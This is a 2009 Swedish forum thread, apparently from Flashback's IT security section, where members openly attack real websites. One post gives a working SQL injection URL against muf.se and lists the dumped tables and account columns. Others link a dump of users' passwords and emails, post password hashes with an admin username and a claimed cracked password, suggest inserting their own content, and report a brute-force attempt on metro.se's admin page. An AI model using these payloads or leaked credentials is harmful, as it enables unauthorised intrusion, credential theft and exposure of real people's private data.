1. Dator och IT
  2. IT-säkerhet

Samling av sidor med säkerhetsbrister - Del 2

Svara
2009-08-11, 02:10
  #409
Tjollepelle
Medlem
Tjollepelles avatar
Ursäkta, detta är lite OT men kan någon hjälpa mig? När jag försöker göra en SQL injection på en sida med säkerthetsbrister så får jag meddelandet:

"Could not get no. of columns for uknown reasons, if you entered a 'true keyword' and nothing, get the columns manually"

Använder SQLI helper v 2.7

Och när jag trycker "Get Columns" så händer inget... programmet reagerar inte. Help?
Citera
2009-08-11, 03:55
  #410
Smurfacc
Bannlyst
Citat:
Ursprungligen postat av Tjollepelle
Ursäkta, detta är lite OT men kan någon hjälpa mig? När jag försöker göra en SQL injection på en sida med säkerthetsbrister så får jag meddelandet:

"Could not get no. of columns for uknown reasons, if you entered a 'true keyword' and nothing, get the columns manually"

Använder SQLI helper v 2.7

Och när jag trycker "Get Columns" så händer inget... programmet reagerar inte. Help?
lär dig sql injektion så fattar du...även de programet säger åt dig "get the columns manually"
Citera
2009-08-12, 21:08
  #411
umz
Medlem
Muf.se

Moderaternas ungdomsskit

http://www.muf.se/kontakt/muf.php?id=25+union+select+all+1,2,group_concat(ta ble_name),4,5,6+from+information_schema.tables+whe re+table_schema=database()--

actionSlide,artiklar,artiklar_author_info,artiklar _comments,artiklar_document,
artiklar_image,artiklar_relaterat,artiklar_sorteri ng,artiklar_sound,artiklar_vote,artiklar_youtube,b logg_author_info,
blogg_document,blogg_image,blogg_sound,blogg_youtu be,ck,debate_account,
debate_account_vote,debate_comments,debate_forum,d ebate_ip_bann

Finns fler tabeller men orkade inte ta fram dom.

Kolumnerna i account tabellen
id,namn,pw,mail,mail_status,access_level,image,ima ge_type,image_status,description,parti,bannText,pe rsonal_url,bannstamp,approved,checksum,joined,numO fPosts
Citera
2009-08-13, 02:04
  #412
kodknack
Medlem
Citat:
Ursprungligen postat av umz
Muf.se

Moderaternas ungdomsskit

http://www.muf.se/kontakt/muf.php?id=25+union+select+all+1,2,group_concat(ta ble_name),4,5,6+from+information_schema.tables+whe re+table_schema=database()--

actionSlide,artiklar,artiklar_author_info,artiklar _comments,artiklar_document,
artiklar_image,artiklar_relaterat,artiklar_sorteri ng,artiklar_sound,artiklar_vote,artiklar_youtube,b logg_author_info,
blogg_document,blogg_image,blogg_sound,blogg_youtu be,ck,debate_account,
debate_account_vote,debate_comments,debate_forum,d ebate_ip_bann

Finns fler tabeller men orkade inte ta fram dom.

Kolumnerna i account tabellen
id,namn,pw,mail,mail_status,access_level,image,ima ge_type,image_status,description,parti,bannText,pe rsonal_url,bannstamp,approved,checksum,joined,numO fPosts


Du skulle ju sålt informationen till några socialdemokrater som vill lägga in en egen artikel på deras hemsida
Citera
2009-08-13, 02:30
  #413
Smurfacc
Bannlyst
Citat:
Ursprungligen postat av kodknack
Du skulle ju sålt informationen till några socialdemokrater som vill lägga in en egen artikel på deras hemsida
Dom har hash på lösenorden och dom e svåra de trodde ja inte om moderaterna...
Citera
2009-08-13, 02:35
  #414
kodknack
Medlem
Citat:
Ursprungligen postat av Smurfacc
Dom har hash på lösenorden och dom e svåra de trodde ja inte om moderaterna...

Insert into....?
Citera
2009-08-13, 02:59
  #415
Smurfacc
Bannlyst
Citat:
Ursprungligen postat av umz
Muf.se

Moderaternas ungdomsskit

http://www.muf.se/kontakt/muf.php?id=25+union+select+all+1,2,group_concat(ta ble_name),4,5,6+from+information_schema.tables+whe re+table_schema=database()--
Tables:

Columns: Table user_admin_access


Columns: Table user_admin_info

dumpar går att ladda ner här http://data.fuskbugg.se/skalman01/muf%20dump.rar alla lösen användarnamn och email
Citera
2009-08-13, 03:32
  #416
kodknack
Medlem
Lösenorden är saltade?

Hur gör man för att cracka såna då, det lär väl vara omöjligt att köra bruteforce på dom om salten innehåller många tecken?

Går det att få tag på salten på något sätt? Lägga in en egen user från sql-hålet och se vad det lösenordet får för hash?


Första användaren i adminaccess tomasb:

1e0ad58979ac31da0c302ac12e62ee60 = kexet

?
__________________
Senast redigerad av kodknack 2009-08-13 kl. 03:37.
Citera
2009-08-13, 03:45
  #417
Smurfacc
Bannlyst
näpp inge salt har knäckt 1 men som sagt svåra lösenord
Citera
2009-08-13, 04:18
  #418
kodknack
Medlem
Citat:
Ursprungligen postat av Smurfacc
näpp inge salt har knäckt 1 men som sagt svåra lösenord

Finns det inga konton som är admin?
Citera
2009-08-13, 04:27
  #419
Smurfacc
Bannlyst
Citat:
Ursprungligen postat av kodknack
Finns det inga konton som är admin?
jopp

dom de inte står "nej" på antar ja e admin:


t.ex amandap&auml:rlefors:de7130b13c494a901303312bec727 4c5:
Citera
2009-08-13, 04:28
  #420
Robs
Medlem
Robss avatar
http://www.metro.se/admin

Försökte bruteforce men ville sig inte, försöker väll imorgon dags att sova.

Undrar lite hur man gör för att egentligen ta reda på lösen etc? för man behöver väll inte vara någon Master på att hacka dessa?
__________________
Senast redigerad av Robs 2009-08-13 kl. 04:31.
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in